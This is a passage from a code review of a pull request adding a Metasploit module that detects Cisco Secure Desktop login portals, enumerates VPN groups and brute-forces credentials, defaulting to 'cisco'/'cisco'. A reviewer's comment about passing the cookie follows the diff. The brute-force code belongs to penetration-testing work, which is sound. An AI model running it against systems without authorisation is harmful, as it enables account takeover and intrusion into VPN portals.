modules/auxiliary/scanner/http/cisco_secure_desktop.rb

```diff
@@ -0,0 +1,337 @@
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Cisco Secure Deskop Bruteforce Login Utility',
+      'Description'    => %{
+        This module scans for Cisco Secure Desktop web login portals and
+        performs login brute force to identify valid credentials.
+      },
+      'Author'         =>
+        [
+          'jnqpblc <jnqpblc[at]gmail.com>', # Revision Author
+          #'Jonathan Claudius <jclaudius[at]trustwave.com>', # Original PoC Author
+        ],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'USERNAME' => 'cisco',
+          'PASSWORD' => 'cisco'
+        }
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('GROUP', [false, "A specific VPN group to use", ''])
+      ])
+  end
+
+  def run_host(ip)
+    unless check_conn?
+      vprint_error("Connection failed, Aborting...")
+      return false
+    end
+
+    unless is_app_secure_desktop?
+      vprint_error("Application does not appear to be Cisco Secure Desktop. Module will not continue.")
+      return false
+    end
+
+    vprint_good("Application appears to be Cisco Secure Desktop. Module will continue.")
+
+    $sdesktop_cookie = get_token_cookie()
+
+    unless is_pwd_login_allowed?
+      vprint_error("Application does not appear to allow password logins. Module will not continue.")
+      return false
+    end
+
+    vprint_good("Application appears to allow password logins. Module will continue.")
+
+    groups = Set.new
+    if datastore['GROUP'].empty?
+      vprint_status("Attempt to Enumerate VPN Groups...")
+      groups = enumerate_vpn_groups
+
+      if groups.empty?
+        vprint_error("Unable to enumerate groups")
+      else
+        vprint_good("Enumerated VPN Groups: #{groups.to_a.join(", ")}")
+      end
+
+    else
+      groups << datastore['GROUP']
+    end
+    groups << ""
+
+    vprint_status("Starting login brute force...")
+    groups.each do |group|
+      each_user_pass do |user, pass|
+        do_login(user, pass, group)
+      end
+    end
+  end
+
+  $sdesktop_cookie = nil
+
+  # Verify whether the connection is working or not
+  def check_conn?
+    begin
+      res = send_request_raw('uri' => '/', 'method' => 'GET')
+      if res
+        vprint_good("Server is responsive...")
+        return true
+      end
+    rescue ::Rex::ConnectionRefused,
+           ::Rex::HostUnreachable,
+           ::Rex::ConnectionTimeout,
+           ::Rex::ConnectionError,
+           ::Errno::EPIPE
+    end
+    false
+  end
+
+  def enumerate_vpn_groups
+    headers = {
+      'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+      'Accept-Language' => 'en-US,en;q=0.5',
+      'Cookie' => "webvpnlogin=1; webvpnLang=en; sdesktop=#{$sdesktop_cookie};",
```

Comment:
`send_request_raw` supports a `cookie` property, rather than specifying the `cookie` as a `headers` key.

I believe this is preferred.